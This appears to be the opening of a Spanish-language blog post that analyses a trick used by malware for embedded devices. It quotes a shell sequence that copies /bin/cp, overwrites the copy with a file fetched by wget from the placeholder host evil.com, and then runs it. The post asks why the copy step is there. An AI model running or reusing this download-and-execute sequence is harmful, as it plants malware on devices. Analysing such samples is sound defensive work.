domingo, 19 de octubre de 2014

Set execution bit without chmod: A malware trick

Sucedió una vez, mientras analizaba por entretenimiento una muestra de malware para dispositivos embebidos, que encontré una secuencia de comandos bastante curiosa:

cd /var/run
cp /bin/cp evil
wget http://evil.com/evil -O evil
chmod +x evil
./evil

El propósito de cada línea, independientemente de las demás, está claro. Sin embargo, lo que me resultaba desconcertante era el comando "cp" ¿Para qué el malware crea una copia de "/bin/cp" si luego la sobrescribe inmediatamente?